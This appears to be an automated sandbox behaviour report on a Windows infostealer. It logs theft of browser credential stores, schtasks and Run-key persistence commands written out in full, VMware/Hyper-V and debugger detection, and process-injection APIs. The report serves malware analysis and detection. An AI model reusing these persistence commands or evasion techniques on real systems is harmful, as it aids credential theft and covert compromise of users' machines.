                        Source: file.exeStatic PE information: invalid certificate
                        Source: file.exe, 00000000.00000000.1969129210.0000000001054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exe, 00000000.00000002.3215072405.0000000001054000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exeBinary or memory string: OriginalFilename$ vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/30@3/5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCA734 CreateToolhelp32Snapshot,RegOpenKeyExA,0_2_00CCA734
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\trixywEuxN9jQl5RTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: file.exe, 00000000.00000002.3214797936.0000000000BFD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: file.exe, 00000000.00000003.2078285837.00000000062DA000.00000004.00000020.00020000.00000000.sdmp, hABmARFSHTPPLogin Data.0.dr, zIzhhVa_EL18Login Data For Account.0.dr, umz__9J7rRLfLogin Data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: file.exeReversingLabs: Detection: 63%
                        Source: file.exeVirustotal: Detection: 57%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHESTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: EdgeMS2.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: file.exeStatic file information: File size 3434744 > 1048576
                        Source: file.exeStatic PE information: Raw size of .vmp\] is bigger than: 0x100000 < 0x2fd000
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6F200 VirtualAllocEx,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,0_2_00B6F200
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: file.exeStatic PE information: section name: .vmp\]
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D20478 push ecx; retf E65Ch0_2_00D20502
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAB275 push FFFFFFD4h; ret 0_2_00CAB286
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5322B push FFFFFFF7h; iretd 0_2_00CF5CB1
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D059DE pushad ; ret 0_2_00D05A0D
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7DEFF push esp; retf 0_2_00C7DF33
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD3F59 push ecx; ret 0_2_00AD3F6C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDE70B push es; iretd 0_2_06BDE70C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDC245 push esi; ret 0_2_06BDC24E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB8F27 push es; ret 0_2_06BB8F45
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDEC98 push es; retn 0000h0_2_06BDECA4
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDEC7B push es; retf 0_2_06BDEC7C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDEC63 push es; ret 0_2_06BDEC64
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BDE8C3 push es; retf 0000h0_2_06BDE8C4
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB5B83 push ecx; ret 0_2_06BB5B96

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862cJump to behavior
                        Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862cJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BA7890 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_06BA7890
                        Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Found stalling execution ending in API Sleep call
                        Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-91183
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB6468 rdtsc 0_2_00CB6468
                        Source: C:\Users\user\Desktop\file.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-91191
                        Source: C:\Users\user\Desktop\file.exe TID: 6156Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\file.exe TID: 6156Thread sleep time: -31031s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB2EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_06BB2EAD
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BCCCFD FindFirstFileExW,0_2_06BCCCFD
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError,0_2_06B7B2C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,0_2_06B7BAC0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BD6276 VirtualQuery,GetSystemInfo,0_2_06BD6276
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 30000Jump to behavior
                        Source: Amcache.hve.0.drBinary or memory string: VMware
                        Source: file.exe, 00000000.00000002.3215883795.00000000062DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}gramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows``Z
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: global block list test formVMware20,11696428655
                        Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.0000000001769000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: file.exe, 00000000.00000003.1993911974.000000000177F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}0
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_649386EC
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
                        Source: file.exe, 00000000.00000002.3215883795.0000000006357000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}r
                        Source: Amcache.hve.0.drBinary or memory string: vmci.sys
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: Amcache.hve.0.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: discord.comVMware20,11696428655f
                        Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}~
                        Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}5b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097\
                        Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: file.exe, 00000000.00000002.3215883795.0000000006347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                        Source: Amcache.hve.0.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                        Source: i6lfSskNm5LrWeb Data.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: file.exe, 00000000.00000002.3215228010.0000000001710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&8
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB6468 rdtsc 0_2_00CB6468
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BAE580 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,0_2_06BAE580
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6F200 VirtualAllocEx,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,0_2_00B6F200
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B66D00 mov eax, dword ptr fs:[00000030h]0_2_00B66D00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B7E3B5 GetHGlobalFromStream,GlobalSize,GlobalLock,VirtualAlloc,RtlGetCompressionWorkSpaceSize,RtlCompressBuffer,GlobalUnlock,GdipDisposeImage,GetProcessHeap,HeapAlloc,0_2_06B7E3B5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB62B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_06BB62B6
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB6014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_06BB6014
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BBFC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_06BBFC07
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06BB5D6C cpuid 0_2_06BB5D6C
